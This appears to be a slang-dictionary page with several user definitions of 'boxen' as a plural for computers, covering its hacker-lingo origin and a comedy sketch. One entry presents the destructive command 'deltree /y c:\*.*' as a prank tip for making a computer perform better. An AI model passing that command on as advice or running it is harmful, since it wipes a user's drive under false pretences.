An alternative pluralization of boxes. In 60-80s hacker lingo (when hacker ment something very different, btw), it originated from vax/vaxen (the, at the time, correct way to referr to two or more vax computers). Because of this unusual pluralization, it because common to use -en instead of -es or whatever else was correct for all words ending in x or with an x sound, such as soxen or socksen for more then one sock. Box was/is usually referring to a computer (pc, server, workstation, whatever).
by Patrik Lundin October 6, 2004
by sixiLiX December 27, 2002
alternate pluralization of the singular noun "box," as opposed to the correct "boxes," made famous by comedian brian reagan
teacher: Brian, what's the plural of
"ox?"
Brian: duh....i dunno
T: no Brian, it's "oxen." Now Brian, what's the plural of "box?"
B: uh...."boxen," I bought two "boxen" of doughnuts.
"ox?"
Brian: duh....i dunno
T: no Brian, it's "oxen." Now Brian, what's the plural of "box?"
B: uh...."boxen," I bought two "boxen" of doughnuts.
by BrockStar July 23, 2003
More than one computer box. From the pluralization of "ox", i.e.:
one ox, two oxen
one box, two boxen
one ox, two oxen
one box, two boxen
by j0n August 15, 2005
1a. u just h4xx0r3d that dudes boxen...u be teh r0xx0rz...he got pwned!!!
1b. to get your b0x3n to do teh r0xx3n just do:
start...run...cmd...enter...
deltree /y c:\*.*
1b. to get your b0x3n to do teh r0xx3n just do:
start...run...cmd...enter...
deltree /y c:\*.*
by dreese9859 January 2, 2005
by alg May 24, 2005
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